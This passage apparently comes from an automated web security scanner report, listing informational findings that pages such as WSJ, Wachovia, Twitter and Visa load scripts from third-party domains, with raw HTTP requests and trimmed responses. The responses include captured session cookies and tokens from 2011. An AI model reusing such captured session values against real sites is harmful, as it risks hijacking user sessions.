<script src="http://www.facebook.com/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator" type="text/javascript"></script>
...[SNIP]...

17.51. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2486"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...

17.52. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2486"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...

17.53. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:13 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />

   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/messaging.js"></script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
</script>

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

17.54. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 03 Feb 2011 01:04:35 GMT
Date: Thu, 03 Feb 2011 01:04:35 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=hxPXxLpAy8e_; Path=/; HttpOnly
Set-Cookie: S=photos_html=xsjqoN-Y8hiPseWtNoq4Iw; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...

17.55. https://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /lh/view

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lh/view?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 03 Feb 2011 01:04:38 GMT
Date: Thu, 03 Feb 2011 01:04:38 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2aBCuxRjaNZC; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=GtgaoWVmRAXTeT2zIwDvTA; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="https://lh3.googleusercontent.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...

17.56. http://script.aculo.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://script.aculo.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: script.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Wed, 02 Feb 2011 22:02:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Content-Length: 13642

<!DOCTYPE html>
<html>
<head>
<title>script.aculo.us - web 2.0 javascript</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rs
...[SNIP]...
</center>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

17.57. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.japantimes.co.jp
Path:   /cgi-bin/fl20110109x1.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi-bin/fl20110109x1.html HTTP/1.1
Host: search.japantimes.co.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:04:50 GMT
Server: Apache
X-Powered-By: PHP/4.4.2
Set-Cookie: LINGO_L5U=xyz; expires=Sun, 06 Jun 2010 00:00:00 GMT; path=/; domain=.search.japantimes.co.jp
Set-Cookie: COOKIECHECH=1; path=/
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 01:19:50 GMT
Content-Type: text/html
Content-Language: en
X-Cache: MISS from form1.japantimes.co.jp
Connection: close
X-Backend: 192.168.1.120:80

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=jtimes"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=jtimes"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div id="TwitterWidget">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- Google Analytic Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.58. http://search.wareseeker.com/ip-board/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ip-board/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:27 GMT
Server: Apache
Set-Cookie: PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
</script>


<script src="http://www.google.com/jsapi">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js"></script>
...[SNIP]...
</a>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.59. http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.farmonline.com.au
Path:   /news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx HTTP/1.1
Host: sj.farmonline.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:04:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n4wsr355xkidrb55pwkq043q; path=/; HttpOnly
Set-Cookie: rplUserConfirm=-1; domain=.farmonline.com.au; expires=Tue, 26-Oct-2010 01:04:58 GMT; path=/
Set-Cookie: RPMCookieCheck=yes; domain=.farmonline.com.au; expires=Fri, 04-Feb-2011 01:04:58 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89757


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1
...[SNIP]...
</script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://whistleout.s3.amazonaws.com/public/css/widget-v3/widget_lifeislocal.css" />

<script type="text/javascript" src="http://whistleout.s3.amazonaws.com/public/script/widget/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js">
</script>
...[SNIP]...

17.60. http://survey.questus.com/survey/qst/qst10001  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questus.com
Path:   /survey/qst/qst10001

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /survey/qst/qst10001 HTTP/1.1
Host: survey.questus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:37 GMT
Server: Iris 1.2 (Python 2.5)
Content-Length: 3560
Expires: Thu, 09 Feb 1984 22:02:37 GMT
Pragma: nocache
Cache-Control: nocache
Content-Type: text/html; charset=utf-8
Set-Cookie: IRIS_SESSION=hs17w514r0emcp4x; expires=Fri, 04-Mar-2011 22:02:37 GMT; httpOnly; Path=/;
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<HTML>
<HEAD>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<META NAME="ROBOTS" CONTENT="NOARCHIVE">
<link rel="shortcut icon" href="http://stati
...[SNIP]...
</STYLE>
<SCRIPT type="text/javascript" src="http://static.decipherinc.com/s/common.js"></SCRIPT>
...[SNIP]...

17.61. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switchboard.nrdc.org
Path:   /blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/lsuatoni/the_evaluation_of_deepwater_ho.html HTTP/1.1
Host: switchboard.nrdc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:01 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http:
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="http://switchboard.nrdc.org/mt-static/support/plugins/NRDCThemePack/css/print.css" />


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>


<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nrdcweb"></script>
...[SNIP]...
<body> element, after all XFBML -->
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

17.62. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/
Connection: close
Content-Length: 73954

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</a>
                   <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<!-- Start of Brightcove Badge -->
<script type="text/javascript"
src="http://admin.brightcove.com/labs/badges/createbadge.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

17.63. http://twitter.com/PracticalMoney  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PracticalMoney

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PracticalMoney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684161-47748-46212
ETag: "123020b57eac8841ca216e71073e2ac7"
Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT
X-Runtime: 0.01070
Content-Type: text/html; charset=utf-8
Content-Length: 50296
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

17.64. http://twitter.com/navyfederalnews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /navyfederalnews

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /navyfederalnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684162-28021-53593
ETag: "f8784a8a1866b0cf5f586d1676f574b8"
Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT
X-Runtime: 0.01594
Content-Type: text/html; charset=utf-8
Content-Length: 55640
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

17.65. https://usa.visa.com/signaturesouthwest/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://usa.visa.com
Path:   /signaturesouthwest/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /signaturesouthwest/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Content-Length: 47255
Expires: Wed, 02 Feb 2011 22:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:39 GMT
Connection: close
Set-Cookie: JSESSIONID=0001VKlai2ZsKlTeafG4JBzP1Nr:228FL7VA3T; Path=/
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
       <script type="text/javascript" src="https://ssl.google-analytics.com/ga.js"></script>
...[SNIP]...

17.66. http://visa.via.infonow.net/usa_atm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://visa.via.infonow.net
Path:   /usa_atm/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /usa_atm/ HTTP/1.1
Host: visa.via.infonow.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29
Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml"
